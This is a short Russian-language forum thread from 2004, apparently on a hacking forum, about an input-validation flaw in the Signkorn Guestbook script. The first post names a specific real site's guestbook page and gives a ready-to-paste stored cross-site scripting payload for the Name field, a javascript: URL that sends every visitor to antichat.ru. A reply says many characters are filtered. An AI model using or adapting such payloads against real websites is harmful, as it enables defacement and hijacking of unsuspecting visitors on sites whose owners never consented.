Уязвимость гостевой книги  signkorn guestbook

Discussion in 'Уязвимости' started by Егорыч+++, 25 May 2004.

  1. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    Signkorn Guestbook - типичный пример скрипта написанного по книжке. Проверяется homepage и mail, но скажем имя не проверяется совсем. Адрес гостевой



    http://www.telekorn.de/cms/front_content.php

    В поле Name вставляем

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><a style=background-image:url(javascript:navigate("http://antichat.ru"));[/QUOTE]<span id='postcolor'>

    И как всегда получаем редирект на АНТИЧАТ..
     
  2. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    много символов не пропускает &nbsp;[​IMG]